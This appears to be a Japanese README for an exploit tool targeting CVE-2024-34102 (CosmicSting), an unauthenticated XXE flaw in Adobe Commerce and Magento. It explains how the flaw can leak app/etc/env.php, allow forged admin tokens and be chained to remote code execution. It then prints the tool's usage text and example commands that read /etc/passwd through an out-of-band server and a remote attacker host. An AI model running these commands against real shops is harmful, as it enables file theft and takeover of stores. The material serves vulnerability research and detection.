
CosmicSting: Adobe Commerce および Magento における認証不要の重大なXXE脆弱性 (CVE-2024-34102)
CVE-2024-34102 は、Adobe Commerce および Magento におけるネストされた逆シリアル化の不適切な処理に起因する重大なセキュリティ上の欠陥です。この脆弱性により、攻撃者は逆シリアル化プロセス中に XML 外部エンティティ (XXE) を悪用でき、リモートでコードを実行される可能性があります。要するに、攻撃者は悪意のある JSON ペイロードを細工し、アプリケーションがそれを逆シリアル化すると、意図しないプロパティや動作を持つオブジェクトがインスタンス化される可能性があります。これにより、さまざまなセキュリティリスクが生じる可能性があります。
この脆弱性を悪用すると、攻撃者は REST API、GraphQL API、または SOAP API への管理者アクセスを不正に取得でき、データの窃取、サービスの中断、影響を受けるシステムの完全な侵害につながる可能性があります。この脆弱性は、認証に使用される暗号鍵を含む app/etc/env.php などの機密ファイルを外部に持ち出せるため、重大なリスクをもたらします。攻撃者はこれを悪用して管理者トークンを偽造し、特権ユーザーとして Magento の API を操作できます。
さらに、CVE-2024-34102 は、PHP フィルタチェーンエクスプロイト (CVE-2024-2961) などの他の脆弱性と連鎖させることができ、リモートコード実行 (RCE) につながります。XML 外部エンティティ (XXE) 脆弱性のより広範な影響により、攻撃者は外部ソースからデータを取得および操作できるようになり、侵害されたシステムへの潜在的影響が悪化します。
usage: exploit.py [-h] --target TARGET --read-file READ_FILE [--oob-server OOB_SERVER] [--host-server HOST_SERVER]
Exploit script for XXE vulnerability
options:
-h, --help show this help message and exit
--target TARGET, -t TARGET
Target URL (http(s)://ip[:port])
--read-file READ_FILE, -r READ_FILE
File to read from the remote host
--oob-server OOB_SERVER, -ob OOB_SERVER
OOB server URL (http(s)://ip[:port])
--host-server HOST_SERVER, -hs HOST_SERVER
Host server URL (http(s)://ip[:port])
例
# Run with local attacker server and local OOB server
python3 exploit.py -t https://magento.test -r "/etc/passwd"
# Run with remote attacker server and remote OOB server
python3 exploit.py -t https://magento.test --oob-server http://xxx.oasitfy.com --host-server https://remote-attacker-server.com -r "/etc/passwd"
# Detection
python3 detect.py -t https://magento.test
このエクスプロイトスクリプトは、研究と効果的な防御技術の開発のみを目的として作成されています。悪意のある目的や許可のない活動に使用することを意図したものではありません。作者およびスクリプトの所有者は、このソフトウェアによって引き起こされた誤用や損害について一切の責任を負いません。ユーザーは、このソフトウェアを責任を持って、適用法および規制に従ってのみ使用することが強く求められます。責任を持って使用してください。